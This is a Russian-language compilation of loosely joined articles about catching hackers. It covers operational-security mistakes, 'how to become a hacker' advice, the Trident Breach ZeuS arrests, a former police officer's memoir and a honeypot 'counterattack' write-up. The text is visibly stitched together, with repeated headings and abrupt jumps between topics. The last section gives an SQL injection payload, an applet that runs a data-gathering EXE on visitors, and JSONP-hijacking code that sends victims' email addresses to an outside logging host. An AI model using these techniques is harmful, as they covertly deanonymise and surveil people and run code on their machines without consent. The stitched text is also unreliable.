Какие ошибки хакера помогают его поймать, или как не спалиться? Как поймать хакера, или как бы веревочке ни виться Требуется изучение Интернета и принципов написания скриптов
Обычный человек, который знает об операциях спецслужб против хакеров только из остросюжетных боевиков, наверняка думает, что подобные мероприятия – это чрезвычайно сложная штука, настоящая «война умов», в которой фатальные ошибки совершаются на уровне написания кодов.
В реальной жизни все происходит совершенно по-другому – компьютерных злоумышленников, как правило, губят лень и элементарная невнимательность.
И в качестве подтверждения своих слов, я приведу несколько случаев деанонимизации и дальнейшей поимки известных хакеров и кибер-преступников.
История о вредности простых паролейДжереми Хаммонд считался одним из самых талантливых хакеров Соединенных Штатов. На его счету значился не один взлом систем безопасности банковских структур, однако, до определенной поры все это ему сходило с рук. Правоохранители плотно начали интересоваться его персоной после того, как Джереми практически в одиночку смог проникнуть в базу данных крупной неправительственной организации, занимавшейся сбором разведывательных данных.
На его след ФБР и ЦРУ навел один из внедренных в хакерскую среду агентов, который был согласен дать свои показания против Хаммонда в суде. Впрочем, этого было мало – против компьютерного злоумышленника были необходимы железобетонные доказательства, которые можно было добыть, только проанализировав данные, хранящиеся на его компьютере.
Естественно, ПК Джереми был запаролен, однако, здесь с ним сыграла злую шутку его собственная лень – в качестве ключа доступа он использовал кличку своего собственного кота. Агенты спецслужб, естественно, знали об имени его домашнего животного и воспользовались этой информацией. В итоге Джереми Хаммонд был осужден на 10 лет.
Чтобы не повторить эту историю, всегда используйте сложные пароли, не имеющие какого-либо открытого смысла.
Ох уж эти мессенджеры…В 2011 году разразился нешуточный скандал – платежная система «Ассист» подверглась мощнейшей DDoS-атаке, в результате которой ее работа была прекращена на несколько суток. По этой причине российский «Аэрофлот», который пользовался ее услугами, понес существенные убытки. С иском об их возмещении авиационная компания обратилась в суд.
В ходе разбирательства следствию удалось выйти на человека, который стоял за организацией DDoS-атаки. Им оказался Павел Врублевский – владелец еще одной платежной системы, который с помощью такого шага хотел покончить с конкурентами. В итоге его наградой стало 2,5 года тюрьмы.
Но как правоохранители вышли на след Врублевского? Все до банального просто – в ходе планирования и осуществления своего замысла он переписывался со своими подельниками в ICQ. Этот мессенджер никогда не отличался надежной защитой, поэтому следователям не составило никакого труда получить доступ к переписке главного подозреваемого.
Поэтому используйте только надежные мессенджеры и общайтесь в сети так, будто за вами уже наблюдают.
С чего следует начинать, если появилось желание научиться повелевать программными кодами и криптографическими ловушками? Как становятся хакерами? Ведь они способны без особого труда проникнуть в чужой компьютер, попутно взломав несколько паролей. Нет ничего странного в желании стать хакером, ведь каждый хоть раз хотел посмотреть чужую почту или аккаунт.
Кто такие хакеры?Итак, как становятся хакерами? В первую очередь потребуется понять, что подразумевается под этим термином. Следует отметить, что хакеры ничего общего не имеют с разного рода злоумышленниками, которые промышляют кражей денег с банковских счетов и атакуют самые разные ресурсы для того, чтобы заблокировать к ним доступ пользователей. Естественно, современные компьютерные умельцы потеряли статус IT-специалиста высшей квалификации. В связи с последними событиями они стали пользоваться плохой репутацией у простых обывателей.
А ведь раньше за этим термином скрывались настоящие компьютерные гении, которые были способны исправлять коды в программах, основываясь на собственных нестандартных алгоритмах. Поэтому, задавшись вопросом о том, как становятся хакерами, следует осознать те цели, которых необходимо будет достигать, овладев этой не совсем простой и редкой профессией. Следует учесть, что на современном этапе имеются разного рода ограничения в законах. И игнорировать их нельзя, так как это повлечет за собой ответственность. К тому же мошенничество в сфере программного обеспечения уже является причиной большого количество скандальных историй. И главными героями в них являются именно хакеры, которые, однако, могут претендовать только на лавры воришек чужих денежных средств и секретов.
Необходимо изучение языков программированияВы хотите еще ответить для себя на вопрос о том, как становятся хакерами? Тогда следует понимать, что без соответствующей подготовки ничего добиться не получится. Карьеру уважаемого эксперта в сфере компьютерных технологий и программ следует начинать с процесса изучения языков программирования. На современном этапе их имеется достаточно много. При этом следует понять, что есть такие языки, которые позволяют общаться непосредственно с персональными компьютерами. С их помощью можно находить решения разного рода задач. Для того чтобы создать автономные программы, применяются современные инструменты. При этом программирование в сети является отдельной отраслью программных кодов с командами, которые позволят структурировать документацию. С их помощью также можно администрировать самые разные процессы в Интернете.
Пытаясь разобраться, кто такой хакер, следует отметить, что имеет место быть еще одна категория языков. Речь идет о механизмах проектирования разнообразных программных платформ в компактных устройствах (мобильных телефонах). В связи с этим, делая выбор в пользу определенной сферы деятельности, требуется осуществить выбор соответствующего языка программирования. Именно на нем и надо сконцентрировать наибольшее внимание.
Даже простые инструкции требуют знанийЕстественно, для того чтобы взломать электронную почту, на современном этапе можно воспользоваться пошаговыми инструкциями. Однако они не позволят понять, кто такой хакер. Да и принципы работы разных программ, а также тонкости передачи данных в Интернете все равно потребуется изучить. В связи с этим следует сначала попытаться изучить терминологию, характерную для среды хакеров и программистов. Именно посредством специфических терминов можно общаться с компьютерными специалистами, не опасаясь дилетантов, которые не имеют достаточных знаний для понимания особого «языка».
Необходимо изучать операционные системыКак стать хакером? Уроки, за счет которых можно изучить данную область деятельности, потребуют достаточно много времени, сил и желания. Что еще необходимо, кроме изучения терминологии и языка программирования? Следует научиться читать операционные системы. Хакерским семейством считается Unix/Linux. Достаточно важной особенностью Unixes является открытость кода. Можно читать, каким образом была написана операционная система. Имеется возможность досконального ее изучения. Также можно предпринять попытки относительно изменения чего-либо. Кроме того, Unix/Linux ориентируется на Интернет.
Требуется изучение Интернета и принципов написания скриптовЧтобы стать хакером, необходимо разобраться, каким образом следует использовать Всемирную паутину. Также следует понимать принципы написания HTML. Web - серьезное исключение, большая игрушка для хакеров. Как было сказано политиками, Интернет способен изменить мир. И только по этой причине с ним необходимо научиться работать.
В том случае, если язык программирования изучен еще не был, писание на HTML поможет приобрести некоторые полезные навыки. Они пригодятся в момент освоения программных кодов и принципов их написания. В связи с этим требуется научиться делать хотя бы домашние странички. Следует также попробовать XHTML. Он более аккуратно проработан по сравнению с классическим HTML.
Технически Всемирная паутина представляет собой комплекс компьютерных сетей. Однако на современном этапе это достаточно важная среда коммуникации, которая может быть использована для выполнения самых разных задач. Следует понимать, что российские хакеры обязаны знать английский. Это связано с наличием большого количества информации, которая доступна только на этом языке.
Никакой монотонности быть не должноБыть специалистом в области компьютеров, программ и всемирной сети - огромное удовольствие. Однако для этого потребуется приложить максимум усилий. Соответственно, необходима мотивация. Чтобы быть хакером, необходимо получать удовольствие от процесса решения проблем в момент оттачивания навыков и тренировки интеллекта. Специалистам такого уровня никогда не бывает скучно долго и кропотливо изучать массу языков и программ, и работа им не кажется монотонной. Они делают то, что им нравится.
Как стать хакером? Набор программ (операционные системы, языки программирования, открытые коды и т.п.), знание английского языка, стремление к постижению чего-то нового - все это поможет в достижении поставленных целей. Но что еще следует помнить?
На основе всего вышесказанного можно сделать вывод. Надо постоянно изучать самые разные дисциплины, языки, литературу, сеть. Хакеров не так уж и много. Поэтому, чтобы стать одним из них, необходимо изначально готовить себя к кропотливой и долгой работе в первую очередь над самим собой. И еще, если с детства вы не любили решать логические задачи, то стоит попробовать найти для себя иное занятие, которое не требует мозгового штурма, максимальной усидчивости и серьезного терпения.
Как стать хакером с нуля
Работа профессионального хакера очень интересна. Взломы сайтов, хищение важной информации, похищение денег, проникновение, разглашение секретов. Возможности настоящего хакера безграничны. Что касается его имени, оно тщательно скрывается.
Молодых людей влечет активная деятельность по хищению информации и взлому сайтов. Но, они не учитывают, что за такие поступки часто приходится отвечать перед законом.
Работа не всегда предусматривает нелегальную деятельность, и это факт. Если желаете работать в компьютерной области, вашими услугами будут пользоваться крупные компании. И неудивительно, ведь хакер – первоклассный IT-специалист.
Как показывает практика, корпорации и крупные банки желают видеть профессионального хакера в своем штате. Организации защищают важную информацию с помощью компьютерных технологий, а специалист способен обнаружить в защите лазейки и предотвратить хищение данных.
Обрести профессию поможет только саморазвитие. Я поделюсь несколькими советами, а вы с их помощью приблизитесь к мечте, возможно, и реализуете ее.
Пошаговый план действийЧетыре изложенных пункта помогут овладеть базовыми навыками. Справившись с задачей, приступайте к изучению профессиональных вопросов и тонкостей хакерства. Благо, интернет переполнен информацией, касающейся сегодняшней темы.
- Цените свое время и коллег . Достижениями обязательно делитесь с «братьями по оружию».
- Уважайте кодекс . У хакеров есть свой кодекс, который запрещает давать или брать взамен. Если удалось взломать чужую программу, сообщите об этом владельцу, чтобы он поработал над защитой своего детища.
- Искорените шаблонные мысли . Хакер не должен мыслить шаблонно. Он обязан обладать способностью быстро и всегда находить ответы.
- Спрашивайте советов . Если что-то непонятно, не стесняйтесь спросить совет на тематическом форуме. Если решили задачу самостоятельно, поведайте алгоритм решения коллегам. В будущем они поступят точно так же.
- Следите за техникой . Компьютер – живой организм и близкий друг IT-специалиста. Поэтому компьютерной технике, стационарным системам, ноутбуку или нетбуку, нужен уход.
Быстро достигните цели, если команда ваших союзников пополнится усидчивостью и свободным временем. Каждый день придется осваивать новую информацию, что принесет опыт.
Видео советы
О компьютерных играх лучше позабыть. Свободное время тратьте на получение знаний, которые пригодятся в будущем. Обязательно прочтите Уголовный кодекс, чтобы избежать неприятной ситуации.
Как стать хакером с чего начать
Продолжая тему сегодняшней статьи, рассмотрим главные этапы обучения, чтобы подробно узнать, с чего начать, чтобы стать хакером.
В художественных фильмах хакеры взламывают платежные системы, сайты государственных учреждений, крупные организации и промышленные объекты. Основной целью взломов выступает важная информация или денежные средства. В реальности не все так просто.
Хакер – обычный программист, который способен взломать программный код. При этом у него другие цели. Он не стремится заполучить важные данные и продать их за большие деньги на «черном рынке». Во время взломов специалист знакомится с принципом работы той или иной программы, изучает код, чтобы найти дыры, создать аналог или схожую программу.
Многие считают хакеров преступниками, которые взламывают и разрушают, поэтому появляются «специалисты», которые хакерами не являются, но пытаются вести подобный образ жизни. Даже начинающий способен навредить сайту или компьютеру, если использует вредоносный скрипт, который маскируется под программу и размещается на сайтах.
В реальной жизни встретить настоящего профессионала в этой области проблематично. Опытный хакер никогда не расскажет, чем занимается. Он работает один, поскольку знает, что подобная деятельность наказуема.
Приготовьтесь к тому, что обучение в домашних условиях будет продолжительным и потребует максимум усилий. Только так покорите вершины и сломаете стереотипы. Помните, действовать нужно в рамках закона.
Видео
Надеюсь, рассказ поможет, а вы, ознакомившись с материалом, быстро добьетесь успеха.
Не забывайте, что создание или изменение программ, которые приводят к незаконному копированию, блокированию или уничтожению важной информации, наказуемое преступление. За такие действия могут лишить свободы на 3 года и оштрафовать на кругленькую сумму.
Борьба с киберпреступностью в наши дни - уже далеко не миф, а суровая
реальность. Прошли времена, когда спецслужбы не знали, с какого конца
подступиться к Сети. Эта история представляет собой яркую иллюстрацию того, что
спецслужбы многому научились и порой занимаются действительно полезными вещами.
В октябре месяце из пресс-релизов ФБР весь мир узнал о масштабной
международной операции Trident Breach (дословно: "удар трезубцем"), в ходе
которой в Великобритании, США и Украине были задержаны более ста человек,
участвовавшие в деятельности крупного ZeuS-ботнета.
О троянце по имени
ты
наверняка уже слышал; мы посвятили этому зловреду не одну статью и заметку. На
всякий случай напомню, что ZeuS, также известный на просторах сети как Zbot, PRG,
Wsnpoem, Gorhax и Kneber - это своего рода последний писк моды и популярнейший
тренд в киберкриминальной среде. Данный инструментарий пользуется на черном
рынке огромным спросом, регулярно обновляется, защищен от нелегального
использования почище лицензионного софта и является настоящей головой болью для
всех IT-безопасников планеты. Авторов этой софтины безуспешно ищут уже довольно
долгое время. А когда не получается найти авторов и вырвать "корень зла",
приходится бороться не с причиной, а со следствиями. Особенно когда следствия
приобретают угрожающий размах.
Расследование, предвосхищавшее массовые аресты, началось около полутора лет
назад, в мае 2009 года. Тогда в ходе работы над делом о краже средств с 46
разных банковских счетов агенты ФБР из города Омаха, штат Небраска, нащупали
"связующее звено" - они обнаружили отчетливые следы деятельности ZeuS-ботнета.
Федеральное бюро расследований быстро сопоставило имеющиеся на руках факты и
пришло к выводу, что масштаб бедствия велик. "Федералы" незамедлительно
связались с местной полицией, своим аналогом Отдела "К" (то есть с парнями,
которые занимаются именно расследованием киберпреступлений), другими
американскими спецслужбами, а затем наладили контакт и со своими зарубежными
коллегами из Украины, Великобритании и Нидерландов. Сразу скажем, что
голландская полиция была привлечена к делу исключительно из-за того, что
злоумышленники использовали некие компьютерные ресурсы Нидерландов.
Вскоре ситуация начала проясняться. Схема, которую использовали сетевые
мошенники, оказалась проста, как три копейки. Основной мишенью этих чуваков
являлись отнюдь не крупные банки и корпорации - они метили в небольшие
организации, муниципальные предприятия, церкви, больницы, а также в редких
частных лиц в основном на территории США. Заражение компьютеров жертв
происходило практически дедовским методом: мошенники использовали целевые
вредоносные e-mail-рассылки (письма несли "на борту" ссылки на ZeuS). Как только
ничего не подозревающие граждане открывали такое письмо и проходили по линку,
вирь вламывался в систему и делал там свое черное дело - собирал номера счетов,
логины, пароли и прочие конфиденциальные данные, связанные с банковскими
аккаунтами. Хозяева ботнета, заполучив эту информацию на руки, сумели добраться
до огромного количества счетов. ФБР сообщает, что таким образом были
осуществлены попытки кражи около $220 млн., но так как не все они были
успешными, реально преступники (по предварительной оценке) сумели заполучить
около $70 млн. Учти, что делалось все весьма аккуратно: ФБР утверждает, что
преступники старались не снимать более нескольких тысяч долларов за раз.
Размах уже впечатляет, правда? Дальше - больше. Как уже было сказано выше,
корни этой преступной группировки вели в Украину и другие страны Восточной
Европы, а сеть так называемых "мулов" (от английского money mule - "денежный
мул") - людей, которые переправляли краденые деньги владельцам ботнета (в
кардерской терминологии - дропов) - как выяснилось позже, насчитывала несколько
сотен человек.
Большинству граждан, арестованных в ходе операции Trident Breach, от 20 до 25
лет, и все они, по сути, являются низшим звеном в структуре работы ботнета.
Когда (и если) кража средств с очередного счета проходит успешно, деньги утекают
отнюдь не прямиком в загребущие руки хозяев зомби-сети. Это было бы слишком
просто, рискованно и примитивно. Здесь в игру и вступают "мулы", они же "дропы".
В случае, о котором мы говорим сегодня, в этой роли в основном выступали...
студенты из Молдавии, Украины, России, Белоруссии и Казахстана, находящиеся в
США по визе J-1, то есть по программе Work&Travel. Для тех, кто не знает: W&T
позволяет молодежи какое-то время с пользой жить на территории США, работая,
общаясь с носителями языка и так далее. Одним словом, учебный и культурный
обмен. Арестованным "студентам" такая программа поездки явно казалась
скучноватой, раз они решили предложить себя кибермошенникам в качестве дропов.
Как это реализовано? Опять же, довольно просто. Вербуют таких "красавцев"
обычно по Сети, например, через социальные сети (в нашем случае ФБР пока
отказывается разглашать название социальной сети, где происходила вербовка). За
работу им предлагают некий процент от обналиченных сумм, обычно в рамках 5-20%
от перевода. Далее возможны варианты. Либо, въехав в США, "мулы" самостоятельно
открывают поддельные банковские счета, на которые и уходят ворованные деньги.
Либо же фэйковые счета дропу предоставляет сам работодатель: например, "мулу"
просто присылают по почте пластиковую карту с PIN-кодом. Зачастую в деле также
замешаны поддельные документы всех мастей. Далее задача "мула" элементарна -
нужно снимать наличность и передавать ее своим "хозяевам".
За примерами этих схем не нужно ходить далеко. В ходе операции Trident Breach
ФБР внедрило одного из своих агентов в мошенническую сеть именно в качестве
дропа. Через российскую социальную сеть (все общение происходило на русском)
агент нашел "работодателя", скрывавшегося под ником Jack Daniels. Jack Daniels,
который впоследствии оказался 26-летним гражданином РФ Антоном Юферицыным,
предложил следующую "работу": требовалось открыть в США несколько банковских
счетов, получать на них переводы и обналичивать деньги. Под пристальным
наблюдением ФБР все было выполнено, да так хорошо, что замаскированный агент
даже сумел лично встретиться с Юферицыным. "Работодатель" вдруг решил воочию
обсудить со "студентом" перспективу открытия бизнес-счета, на которой можно было
бы переводить больше денег. Очевидно, в ходе этой первой встречи Jack Daniels
ничего не заподозрил, так как вскоре на счет подставного "мула" поступил первый
перевод в размере $9983. Через несколько дней Jack Daniels назначил агенту
повторную встречу, на этот раз уже непосредственно для передачи денег. В ходе
этого действа Юферицын и был благополучно арестован.
Ему предъявили обвинение в сговоре с целью мошенничества, свою вину Jack
Daniels признал и даже дал показания против других участников группировки. Но
самое интересное в том, что на данный момент Антону Юферицыну уже вынесен
приговор, и он оказался удивительно мягок: 10 месяцев тюрьмы и $38 314 штрафа.
Дело в том, что обвинение до последнего настаивало на максимальном наказании в
20 лет лишения свободы и штрафе в $500 000. Можно предположить, что Юферицына
либо поймали существенно раньше, чем было объявлено официально, либо же он очень
рьяно сотрудничал после ареста:).
Как уже было сказано выше, большинство арестованных занимали отнюдь не
ключевые посты в преступной группировке. Большинство из тех, кому предъявили
обвинения или арестовали - простые дропы. Только в США было арестовано 39
человек, а в целом обвинения предъявлены 92 людям! В пресс-релизах, выпущенных
по этому поводу Федеральным бюро расследований, подробно рассказано практически
о каждом конкретном случае. К примеру, сообщается, что гражданин РФ Максим
Мирошниченко вербовал дропов, сам открыл как минимум пять поддельных счетов в
банках TD Bank, Chase Bank, Bank of America и Wachovia, а также пользовался
поддельными паспортами и имел контакты с хакерами и лицами, которые могли помочь
оформить поддельные документы другим членам организации. Остальные случаи
похожи, как две капли воды: это или "мулы", или вот такие, в общем-то, мелкие
координаторы. Обвинения им были предъявлены самые разные - от сговора с целью
совершения банковского мошенничества и просто банковского мошенничества до
отмывания денег, подделки документов, использования поддельных документов и
незаконного использования паспортов. Тюремные сроки и штрафы всем грозят крайне
серьезные: от 10 до 30 лет и от $250 000 до $1 млн. соответственно. Впрочем,
неизвестно, удастся ли обвинению настоять на своем, или получится как с
Юферицыным.
Однако, помимо сотни дропов, пойманных американцами, еще 20 человек было
арестовано в Великобритании (также было проведено восемь обысков) и еще пятеро в
Украине. И если в Соединенном Королевстве ситуация почти аналогична
американской, то с украинцами все несколько сложнее. Дело в том, что, согласно
сообщениям ФБР и украинского СБУ, здесь, похоже, поймали самую верхушку
группировки - организаторов всей вышеописанной схемы. Нет, разумеется, авторов
злосчастного ZBot среди арестованных не было (хотя, по мнению многих экспертов и
представителей спецслужб, малварь создан именно в странах Восточной Европы).
Информации об этих пятерых вообще пока крайне мало, однако известно, что у ФБР
есть основания полагать, что руководители ботнета контактировали с
разработчиками ZeuS, которые делали им на заказ особые версии инструментария.
Все вышеизложенное, конечно, далеко не конец истории. В розыске до сих пор
находится не один десяток человек, впереди наверняка не один обыск, арест, а
также куча судебных разбирательств. Но, как бы то ни было, операция Trident
Breach наглядно доказывает, что спецслужбы мира все же могут "найти подход" к
ботнетам и умеют арестовывать не только "мулов", но и людей, стоящих в
преступной иерархии повыше. И пусть мы с тобой понимаем, что эта сотня с
небольшим человек - капля в море, а $70 млн. - жалкие крохи от исчезающих в
неизвестных направлениях миллиардов, для спецслужб это все равно почти
невиданный размах, да и в целом неплохая тенденция.
Давно хотел рассказать как я работал в отделе "К", как собирал доказательства, как искал и как задерживал преступников. Начну с начала.
Как я попал туда: помог хороший знакомый в полиции (тогдашней милиции), грит мол давай к нам в отдел "К", ну после универа выбора у меня не было и я согласился.
Что я делал в начале: В компьютерах я разбираюсь хорошо, по этому посадили меня составлять запросы провайдерам, хостерам и подобным организациям. На самом деле это пустая формальность, бумажка требуется в качестве доказательства. Пробить IP адрес можно было и без официального запроса, например рос*теле*ком выдавал информацию о владельце по одному телефонному звонку, естественно официально такой процедуры нет, но есть договорённость.
Сбор доказательств: это вторая ступенька моей карьерной лестницы которая добавилась к первой. Собирал доказательства я одной кнопкой prtscr, отправлял их на подпись+печать и подшивал в папочку. В большинстве случаев я просто делал скриншоты сайтов с ЦП (чилд порн) и экстремистскими материалами, но бывали задачи и посложнее, такие как чтение переписки и просмотр видео/фото, но об этом чуть позже. Как только насобирал достаточно доказательств - отправлял запрос провайдеру, провайдер отвечал очень быстро и давал бумагу со следующими данными о владельце IP адреса:
3. Паспортные данные
4. MAC адрес устройства (это важно, ниже расскажу почему)
Небольшая заметка: большинство видео и фото, которые я смотрел вполне себе официально - ЦП.... и это жесть.... их было очень много, я переживал за участников, но потом осознал, что большинство авторов этих роликов/фото найдут и жестоко покарают кожаными дубинками во все щели. Работать стало проще.
Поиски злодеев: злодеи бывают разные, экстремистов ищут в одном месте, педофилов в другом, мошенников в третьем. Самые глупые - педофилы, которые расшаривали диск с ЦП в программах DC++ (раньше были очень популярны), одним этим действием они вешали на себя 242 статью (распространение). К слову сказать, вычислять таких было делом техники, часто рядом на диске я находил личные фотографии по которым можно было с уверенностью сказать, что человек без лица с ЦП видео/фото тот же самый, что и на обычном фото, бывало и документы лежали. Если ничего нет - искал файлы с паролями от популярных браузеров (при условие что расшарен диск с браузером), зачастую там были аккаунты владельца компьютера и это тоже шло в доказательную базу.
Задержание злодеев: всё начинается рано утром, обычно в 6 утра. В начале возле дома преступника паркуется грузовой микроавтобус (как автолайн или маршрутка) с группой захвата. Затем подкатывает машина с оперативниками и все очень тихо поднимаются на этаж. Автомобили тем временем отъезжают на соседнюю улицу. Жильцов квартиры просят открыть дверь под любым предлогом: пожар, соседи с низу, газовая служба и тп. Если повезло и дверь открыли - вламывается группа захвата, укладывает всех на пол, проверяет что бы всё было "чисто" и только после этого заходят оперативники.
Процессуальные действия: в обязательном порядке привлекают понятых, в 6 утра их сложно найти, по этому обычно, в качестве понятых свои люди, которые подпишут любой беспредел и им за это ничего не будет, зачастую это практиканты с универов. Со стола, с мышки и клавиатуры скатывают отпечатки и берут какие то пробы (я в этом не силён). Если компьютер включен - нам очень повезло, если запаролен - нужно попросить владельца его включить... в начале просят вежливо, потом просят дубинками, берцами и разнообразными методами пыток которые не оставляют следов, НО, я очень надеюсь, что такого беспредела как раньше сейчас нет.
Сбор улик: описывают всю технику, самое важное: устройство с MAC адресом который засветился у провайдера, обычно это роутер. Так же изымают компьютер или ноутбук. Если владелец выдержал все попытки узнать пароль - компьютер отправляют на экспертизу.
Заметка про экспертизу: Вы думаете эксперты будут подбирать пароль? Нет. Они вытаскивают хард, подключают его к своему компуктеру и тупо смотрят файлы. Если на HDD найден криптоконтейнер - его никто не будет расшифровывать, у них нет суперкомпьютеров под это дело.
Почему я уволился: не буду рассказывать ванильные истории, всё на много проще - я нашёл другую работу с достойной зарплатой. На моё место пришли хорошие ребята которых я обучил перед уходом. Связи не потерял...
P.S. Если преступник скрывается за VPN или публичным прокси другой страны - можно считать дело висяком, расследовать их будут только если попросят сверху или что то действительно стоящее и важное. На такое может уйти и год и два.
Не раз я сталкивался с вопросами пользователей, можно ли каким либо образом вычислить хакера который взломал тот или иной сайт. Вопрос достаточно интересный и однозначного ответа на него дать невозможно. Конечно же все зависит от квалификации человека который осуществляет атаку и от его осторожности. Но как оказалось на практике, очень многие хакеры совершают достаточно глупые ошибки и раскрывают свою анонимность. Давай посмотрим как.
Прежде всего… а зачем мне это? Я не «трехбуквенник», а скромный инженер, замыслов по захвату мира у меня пока нету и прочими недобросовестными делами я не занимаюсь, так чем же мне не угодила анонимность? Ответ прост - анонимусами, хацкерами, скрипт-кидисами… Эти ребята вечно пытаются что-то там сломать, украсть, испортить или погонять свое ЧСВ. Дело это, если подумать не такое уж и плохое (лучше чем в подворотне наркотиками баловаться), но раз ребята любят поиграть - давайте поиграем с ними.
Их анонимность дело не святое, поэтому можно с ней и посражаться 8) Но как общий результат, все это работает с любым пользователем сети Интернет, просто я применил усилия исключительно против атакующих, тех кто пытается получить несанкционированный доступ и нарушить статью 272 УК РФ. Кроме того, мой опыт будет интересной иллюстрацией к теме «контратаки» на самих атакующих в автоматическом режиме без участия человека. Результат контратаки - раскрытие информации об атакующем, что, согласитесь, дело хорошее, а не плохое…
Бочонок с медомДля того, чтобы не повредить анонимности ни в чем не повинных граждан и контратаковать только «злодеев», нужно быть уверенным, что данный юзверь - взломщик. Для этого достаточно иметь систему анализа поведения посетителя с механизмом обнаружения «атакующих» действий. Короче говоря, достаточно сделать honeypot . Для этого не надо разворачивать honeyd и тд. Например для общего случая с WEB ресурсом, достаточно на продакшн сервере расположить один псевдо-рабочий скрипт, который будет изображать полезность и функциональность, но на деле будет детектировать попытки проникновения и в случае «удачной» атаки изображать, что этот взлом удался. После этого исполнять контр-атаку на этого конкретного пользователя.
Наглядный пример, создадим скрипт admin.php или /admin/ не важно, любой уважающий себя атакующий найдет этот URI за несколько секунд, это очевидный ход. В случае, если хочется повысить внимание нежелательных элементов к ловушке, можно разместить линк с главной страницы (мол админка тут), ведь главная задача, чтобы плохой парень начал атаковать первым делом хонипот, а не ковырялся в нормальных скриптах.
В скрипте псевдо-админки, ясно дело, спрашивают логин и пароль. Далее дело фантазии, можно ждать когда атакующий пробрутит перебором пароль либо сделать эмуляцию уязвимости класса SQL Injection, и тогда подойдет любой пароль класса ‘ or 1=1/* , который будет давать доступ в «админку». При этом мы можем собирать статистику - как была взломана админка, подбором или через SQLi . Ну и само собой - любой кто попал в «админку» является «плохим» парнем, и его раскрытие его анонимности не вызывает у меня проблем морали.
Собственно в 2011 я разместил такой скрипт на своем горе сайте и стал ждать… ждал я не долго, так как сайт был посвящен теме ИБ, то желающих зОхакать его превышало всякое воображение.
Очевидно, что в самом общем случае, все что мы имеем об посетителе веб сайта (и атакующем, в нашем частном случае) это лишь IP адрес, User-Agent и тд. Как я говорил, мы не CIA/FSB/MOSSAD… у нас нет или PRISM, и мы понимаем, что IP адрес (учитывая разные там Proxy серверы и TOR) - это фактически НИЧЕГО. С этим мы и имеем дело в большинстве случаев, но если разыграть один тонкий психологический момент (конкретно касающегося скрипт-кидди), то выяснится, что эти ребята не ждут подвоха! Другими словами, в теле «админки» можно сделать что угодно - повесить сплойт-пак например, и пробивать сплойтами нерадивых. Но я сыграл более «плоско», я запустил Апплет Java. Мол вы прошли аутентификацию… вот наша панель GUI на Java.
Элемент социальной инженерии - атакующий в порыве радости от успешной атаки SQLi может тупо запустить апплет. И… я удивился, но таких было достаточно (конечно потом, с течением времени процент пробива падал, так как информация о подставе быстро разошлась среди узкого круга специалистов;). Собственно апплет тупо дергал EXE файл с сервера и запускал его.
EXE файл собирал НЕ ПЕРСОНАЛЬНЫЕ данные (да да, я блюду ФЗ о ПДн…), только следующую инфу: IP локальный, traceroute из сети, имя машины, логин пользователя. Это не много, но в большинстве случаев этого достаточно чтобы обойти TOR/Proxy/VPN и даже узнать фамилию атакующего! Дополнительно, конечно, можно было бы собирать BSSID окружающих точек доступа, например, и делать съемку с веб-камеры ноута, парсить конфиг файлы с винта и тд и тп. Короче суть в том, что установив «агента контр-разведки» на ПК атакующего мы обошли многие преграды, и TOR и Proxy уже не при делах. Очевидная контр-атака.
Примечание: мой агент не имел удаленного доступа, хотя технически это можно было закодить, я не хотел бекдорить и распространять вредоносное ПО. Данный агент не был вредоносным, так как собирал сугубо техническую инфу об ПК атакующего и его сетевом окружении. Кстати, все данные передавались реверсивным DNS каналом, что улучшало успешные «отстукивания» с данными - http://www.xakep.ru/post/55661/ .
1) Министерство обороны РФ
Одни из первых, попытались применить атаку типа SQLi ребята с ВНЕШНЕГО IP Министерства обороны Российской Федерации. К моему счастью, они либо не повелись на апплет, либо у них был Linux (так как мне впадлу было добавлять кросс-платформенность). Я знаю, что там хорошие ребята и, конечно, ничего плохого они не хотели! Но надеюсь при реальных «разведывательных операциях» они используют хотя бы китайские прокси сервера 😉
2) Антивирусная компания
Этот запуск был сделан с виртуальной машины антивирусной компании. DNS сервер и tracert спалили контору 8) Примечательно что ребята не добавили агента в список вредоносного ПО! Оценили. Спасибо вам ребята!
3) Куча ребят
Просто куча разных ребят, кто-то знал о фиче и просто игрался, кто-то нет (http://habrahabr.ru/post/122107/#comment_4003842)
4) И самое интересное Хост принадлежащий РАЗВЕДКЕ одной из стран СНГ. С «обратным» проникновением.
Поначалу я решил что вот она, кибер война началась! Наш агент в результате контр-атаки оказался запущен на хосте, принадлежащем службе разведки другого гос-ва. Только учетная запись выглядела как сервисная, что наводило на мысль, что хост был скомпрометирован и использовался как посредник. Чуть позже в то же день мы получили инсталл второго «агента» из той же страны, только в этот раз не из сети правительственного учреждения, а с домашнего ПК. Имя пользователя ПК оказалось легко гуглящимся и идентифицировать человека вышло без проблем. При этом, учитывая, эти «совпадения», можно сказать что либо он работает на эту разведку, либо как-то получил доступ к правительственному хосту.
Окей, мы поняли, что простейший путь раскрытия анонимности - контратака через сплойт-паки или с элементами СИ, но это толсто и очевидно. Но была еще одна идея - сторонние сервисы, такие как веб-почта или, например, социальные сети. Можно сделать атаку более незаметной… что я и сделал 8)
Да, кроме апплета, в случае успешной атаки на меня, я узнавал e-mail атакующего, чтобы точно знать «кто виноват» (ну а что делать и так ясно..). И опять же, анонимность это не TOR/VPN/Proxy chain . Этого не достаточно! И так суть проста, если гражданин использует сервисы типа ВКонтакте, yandex, google, linkedin, twitter, facebook и тд… и при этом он на них постоянно аутентифицирован, то при наличии каких-либо уязвимостей () на этих сервисах позволят раскрыть ВАШУ анонимность. Так получилось, что на сервисах mail.ru и yandex.ru были найдены уязвимости (я о них сообщил давно, и они давно запатчены, тем нем менее я успел испытать ради моего «научного» эксперимента по практической поимке злых парней…). Уязвимость самая банальная (на обоих сервисах): JSONP Hijacking. Суть проста, есть некий сервис:
mail-service.com/ajax?callback=func
Соответственно, для эксплуатации этой бреши и раскрытия анонимности используем код:
function func(obj) { var url="http://loger.com/log.php?value="+obj["e-mail"]; $.get(url); }
function func (obj ) var url = "http://loger.com/log.php?value=" + obj [ "e-mail" ] ; $ . get (url ) ;
< script src = "http://mail-service.com/ajax?callback=func" / > |
Так что помните: можете забыть о TOR/VPN, если вы вечно носитесь по соц. сетям, даже не надо иметь , чтобы проследить кто вы и откуда, достаточно «тупых» CSRF/XSS.
Типичный атакующий:
Кстати, как еще пример такого подхода, сеть linkedin, даже не нужна уязвимость, там это реальная фича - лог тех, кто просматривал ваш профайл. То есть если на мою админку повесить тупо редирект на специальный зарегистрированный профайл linkedin:
То в итоге можем прямо в linkedin’е узнавать больше информации об атакующих:
Кстати, можно заметить, что SAMEORIGIN не помогает, так как GET запрос проходит до того, как браузер проверит ORIGIN политику, проверка происходит ПОТОМ 😉
